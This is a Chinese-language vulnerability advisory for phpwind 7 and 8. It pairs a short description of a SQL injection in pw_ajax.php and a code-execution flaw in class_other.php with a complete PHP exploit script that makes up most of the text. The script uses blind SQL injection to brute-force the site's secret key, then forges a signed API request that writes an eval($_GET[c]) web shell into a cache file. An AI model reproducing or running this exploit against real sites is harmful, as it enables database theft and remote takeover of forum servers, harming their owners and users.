phpwind多個遠程代碼執行漏洞
phpwind 7和8版本存在輸入驗證漏洞,攻擊者成功利用該漏洞可以遠程執行任意php代碼。
問題存在于pw_ajax.php中,由于用戶提交給fieldname參數的數據缺少充分的過濾,攻擊者可利用漏洞進行SQL注入攻擊獲取任何數據庫里的數據。
另外class_other.php中存在一個任意命令執行的漏洞,由于對$class[cid]輸入缺少充分過濾,不過進入此邏輯需要一些較為關鍵的key,借助上面的注射漏洞即可獲得該key。
PHPWind has a sql injection vulnerability, which can be exploited by malicious people to conduct SQL injection attacks.
Input passed to the “fieldname” Parameter in pw_ajax.php is not properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
In addition Input passed to the “$class[cid]” Parameter in class_other.php is not properly sanitised before being used in a SQL query. But in order to reach this logic code need some important key, attacker could exploit above sql injection vulnerability to get key .
測試代碼
echo ”
Info: Poc for Phpwind遠程命令執行
Test: exploit.php user password http://www.blackxl.org/phpwind/
“;
if($argc<3){
echo “\r\n參數缺少\r\n”;
die();
}
$user=$argv[1];
$pass=$argv[2];
$pwurl=$argv[3];
$myheader=array(
‘Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8′,
‘Accept-Language: zh-cn,zh;q=0.5′,
‘Accept-Charset: gb2312,utf-8;q=0.7,*;q=0.7′,
‘Content-Type: application/x-www-form-urlencoded; charset=UTF-8′,
‘Referer: http://www.blackxl.org‘,
‘Connection: Keep-Alive’,
‘Cache-Control: no-cache’,
‘User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; InfoPath.2)’
);
$cookie=”";
$str=curlsend(“$pwurl/login.php?”,”POST”,0,$myheader,”forward=&jumpurl=http%3A%2F%2F127.0.0.1%2FPHPWind/upload%2F&step=2&lgt=0&pwuser=$user&pwpwd=$pass&hideid=0&cktime=31536000&submit=%B5%C7%C2%BC”,1);
preg_match_all(“/Set-Cookie:([^;]+)/is”,$str,$array);
for($i=0;$i
$cookie=$cookie.”;”.$array[1][$i];
}
//echo $cookie;
$test = curlsend(‘$pwurl/pw_ajax.php’,”POST”,0,$myheader,”,1);
if(strpos($test,’’)) {
die(‘用戶密碼或者其他參數錯誤’);
}
$shellcode=”action=pcdelimg&fieldname=db_value%20from%20pw_config%20where%20db_name%20like%200x64625f736974656f776e65726964%20and%20db_value%20like%200x{offset}25%20union%20select%200x612e2e;%23″;
$hash=”0123456789abcdef”;
$craked=”";
for($i=0;$i<32;$i++){
for($n=0;$n<16;$n++){
$tmp=str_replace(“{offset}”,bin2hex($craked.$hash[$n]),$shellcode);
$tmp=curlsend(“$pwurl/pw_ajax.php”,”POST”,0,$myheader,$tmp,0);
if(strpos($tmp,”pw_config”)){
echo “CrackEd Offset “.($i+1).” :”.$hash[$n].”\r\n”;
$craked=$craked.$hash[$n];
break;
}
}
}
echo “Craked Magicdata :”.$craked.”\r\n”;
echo “Get shell :”;
//another 0day
$arg=”;
$hack = array();
$hack['mode'] = ‘Other’;
$hack['method'] = ‘threadscateGory’;
$hack['params'] = ‘a:1:{s:3:”cid”;a:1:{s:3:”cid”;a:1:{s:3:”cid”;s:21:”\’.eval($_GET[c]).\’abc”;}}}’;
$hack['type'] = ‘app’;
$hack = strips($hack);
ksort($hack);
reset($hack);
foreach ($hack as $key => $value) {
if ($value && $key != ‘sig’) {
$arg .= “$key=$value&”;
}
}
$arg.=’sig=’.md5($arg.$craked);
echo file_get_contents(“$pwurl/pw_api.php?”.$arg);
echo “OK\r\n”;
$str=file_get_contents(“$pwurl/data/bbscache/info_class.php?c=echo%20Just_wooyun;”);
if(strpos($str,’wooyun’)){
echo “Got shell :”.”$pwurl/data/bbscache/info_class.php?c=phpinfo();”;
echo “\r\nOver!”;
}
function strips($param) {
if (is_array($param)) {
foreach ($param as $key => $value) {
$param[$key] = strips($value);
}
} else {
$param = stripslashes($param);
}
return $param;
}
function curlsend($url,$method=false,$ssl=0,$myheader,$data=”,$header=0){
global $cookie;
$ch = curl_init();
$timeout = 0; // set to zero for no timeout
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_POST, $method);
curl_setopt($ch,CURLOPT_HTTPHEADER,$myheader);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
if($data){
curl_setopt ($ch, CURLOPT_POSTFIELDS,$data);
}
curl_setopt ($ch, CURLOPT_HEADER, $header);
if($ssl){
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
}
$handles = curl_exec($ch);
curl_close($ch);
//echo $handles;
return $handles;
}
關健詞:phpwind,遠程代碼
新文章:
- CentOS7下圖形配置網絡的方法
- CentOS 7如何添加刪除用戶
- 如何解決centos7雙系統后丟失windows啟動項
- CentOS單網卡如何批量添加不同IP段
- CentOS下iconv命令的介紹
- Centos7 SSH密鑰登陸及密碼密鑰雙重驗證詳解
- CentOS 7.1添加刪除用戶的方法
- CentOS查找/掃描局域網打印機IP講解
- CentOS7使用hostapd實現無AP模式的詳解
- su命令不能切換root的解決方法
- 解決VMware下CentOS7網絡重啟出錯
- 解決Centos7雙系統后丟失windows啟動項
- CentOS下如何避免文件覆蓋
- CentOS7和CentOS6系統有什么不同呢
- Centos 6.6默認iptable規則詳解